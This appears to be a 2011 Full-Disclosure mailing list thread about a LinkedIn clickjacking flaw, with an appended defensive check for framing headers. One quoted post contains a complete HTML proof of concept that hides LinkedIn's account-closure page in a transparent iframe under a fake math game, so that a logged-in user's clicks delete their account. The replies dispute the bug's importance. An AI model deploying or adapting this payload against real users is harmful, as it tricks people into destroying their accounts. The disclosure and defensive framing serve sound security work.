Open Source and information security mailing list archives
 
Date: Mon, 10 Oct 2011 09:36:17 +1100
From: xD 0x41 <secn3t@...il.com>
To: Ferenc Kovacs <tyra3l@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: LinkedIn_User Account Delete using Clickjacking

> it seems that you aren't familiar with what Clickjacking means then...

No... and I am happy not to know :-) Like XSS, I do not waste time with
minority bugs such as 'clickjacking' and these new such terms which are
total BS.
Anyhow... call it what you like, it is BS (just like the win32 dll crap and
simple-xss CRAP!)
xd



On 10 October 2011 04:53, Ferenc Kovacs <tyra3l@...il.com> wrote:

> it seems that you aren't familiar with what Clickjacking means then...
>
> On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 <secn3t@...il.com> wrote:
> > That's just lame dude.... if you could remove OTHER people's accounts, then I'd
> > say *clap clap*... but own account... what about just clicking "close
> > account", and let's skip creating a html page, for this... :) cheers
> >
> >
> > On 8 October 2011 17:06, asish agarwalla <asishagarwalla@...il.com> wrote:
> >>
> >> Be logged into Linkedin, in firefox
> >> Create a HTML page using the below code
> >> Open the created HTML page in a new firefox tab
> >> Play the simple game
> >>
> >> <html>
> >> <head>
> >> <style>
> >> button.dummy1{position:absolute;top:75px;left:177px;z-index:-10}
> >> button.dummy3{position:absolute;top:214px;left:177px;z-index:-10}
> >> #Div3{
> >> opacity: 0;
> >> position: absolute;
> >> top: 25px;
> >> left: 160px;
> >> }
> >> #Div2{
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 340px;
> >> }
> >> #Div1 {
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 195px;
> >> }
> >> #victim2 {
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 50px;
> >> }
> >> #victim {
> >> opacity: 0.4;
> >> position: absolute;
> >> top: -226px;
> >> left: -35px;
> >> width:800px;
> >> height: 800px;
> >> }
> >> </style>
> >> </head>
> >> <body>
> >> <div>
> >> <h1>Please Click Twice on the Right Options And Then Click Submit</h1>
> >> </div>
> >> <div id=Div3>
> >> <h1>55+27=?</h1>
> >> </div>
> >> <div id=victim2>
> >> <h1>55 </h1>
> >> </div>
> >> <div id=Div1>
> >> <h1>82</h1>
> >> </div>
> >> <div id=Div2>
> >> <h1>95</h1>
> >> </div>
> >> <button type="button" class="dummy3">Submit</button>
> >> <div id=victim>
> >> <iframe
> >> src="https://www.linkedin.com/secure/settings?closemyaccountstart=&goback=.nas_*1_*1_*1"
> >> border=0 scrolling=no width=650 height=1100></iframe>
> >> </div>
> >> </body>
> >> </html>
> >>
> >>
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
>
>
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu
>
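
The page quoted above only works if the account-settings response may be rendered in an iframe on another origin. As an added example (not part of this thread or of any site's own code), here is a header check a defender could run against such a response. The function names and sample origins are constructed, and it assumes frame-ancestors source lists contain only 'none', 'self', * or full origins.

```javascript
// Added example: decide from response headers whether a page on another
// origin may render this response inside a frame. Header names are the
// standard ones; function names and sample values are constructed.

function parseFrameAncestors(csp) {
  // Return the source list of the frame-ancestors directive, or null if absent.
  for (const part of csp.split(';')) {
    const tokens = part.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') return tokens.slice(1);
  }
  return null;
}

function canBeFramedBy(headers, pageOrigin, embedderOrigin) {
  // HTTP field names are case-insensitive, so normalise them first.
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  // An enforced CSP frame-ancestors directive takes precedence over
  // X-Frame-Options when both are present.
  const csp = h['content-security-policy'];
  const sources = csp !== undefined ? parseFrameAncestors(csp) : null;
  if (sources !== null) {
    // An empty source list behaves like 'none': some() on [] is false.
    return sources.some((s) => {
      const src = s.toLowerCase();
      if (src === "'none'") return false;
      if (src === "'self'") return embedderOrigin === pageOrigin;
      if (src === '*') return true;
      return src === embedderOrigin.toLowerCase(); // exact origin match only
    });
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return embedderOrigin === pageOrigin;
  // Missing or unrecognised value (including obsolete ALLOW-FROM):
  // treat the response as unprotected.
  return true;
}
```

A state-changing page such as an account-closure form should make this return false for every origin other than its own.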
